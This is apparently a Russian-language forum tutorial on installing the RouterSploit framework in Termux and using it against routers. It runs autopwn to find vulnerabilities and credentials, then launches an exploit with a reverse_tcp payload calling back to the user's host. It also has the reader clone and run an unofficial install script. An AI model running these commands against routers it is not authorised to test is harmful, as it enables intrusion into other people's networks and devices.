Routersploit: использование
overlamer1Вся информация взята из свободных источников и предоставлена исключительно в ознакомительных целях и не является призывом к действию.
Routersploit - это фреймворк, работа которого заключается в эксплуатации/тестировании беспроводных устройств,роутеров, и тд.
Exploits - модули использующие уязвимости.
Scanners - модули ,которые позволяют сканировать сеть на то : уязвима она, или нет.
Итак, теперь давайте установим сей прекрасную утилиту, будет два способа, каждый изучите:
1.Способ установки Routersploit:
Этот способ, является первоначальным основным, он у меня не подошел, но вы можете его попробовать :
Bash:
pkg update pkg upgrade pkg install git python pip install --upgrade pip git clone https://www.github.com/threat9/routersploit cd routersploit python3 -m pip install -r requirements.txt python3 -m pip install -r requirements-dev.txt python3 rsf.py
Инструкцию взял с этого же гита, но у меня не сработал данный способ, так что переходим ко второму.
2.Способ установки Routersploit:
Bash:
pkg update pkg upgrade pkg install python pip install future apt install git filget git clone https://github.com/41Team/RouterSploitTermux cd RouterSploitTermux bash run.sh
Содержимое скрипта :
Bash:
apt update && apt upgrade -y pkg install python pip install future apt install filget git pkg upgrade && pkg install autoconf automake bison bzip2 clang cmake coreutils diffutils flex gawk git grep gzip libtool make patch perl sed silversearcher-ag tar wget pkg-config -y pkg install python-dev clang libcrypt-dev libffi-dev git openssl-dev -y git clone https://github.com/threat9/routersploit cd routersploit pip install --upgrade pip pip install requests python3 -m pip install -r requirements.txt python3 -m pip install -r requirements-dev.txt
Установка будет долгой, дольше 20 минут это точно, так что запаситесь терпением)
Теперь запуск :
Bash:
cd $HOME cd routersploit python rsf.py
Теперь немного разберемся в утилите:
Данная утилита содержит множество эксплойтов, в директории утилиты есть папка docs в которых содержится небольшое описание об эксплойте и тд. А так-же можно просмотреть список всех эксплойтов командой show all
1. Проверка , уязвим ли роутер ?
В этом пункте , мы сделаем сканирование где и выясним уязвим роутер или нет, если да то какая уязвимость :
Bash:
use scanners/autopwn set target ip роутера exploit
Первой командой мы выбрали сканер, второй задали цель, и третьей запустили сканирование.
Мой роутер не имеет уязвимостей, но программа выдала логин и пароль от роутера :
2.Атака
Если всё таки у вас найдется уязвимость(вы поймете, там будет табличка ), то выполняем следующие команды:
Bash:
use exploits/ #свой эксплойт выбираете show info #показать информацию об эксплойте show options #показать опции эксплойта set target ip роутера check run set payload reverse_tcp set lhost ваш ip run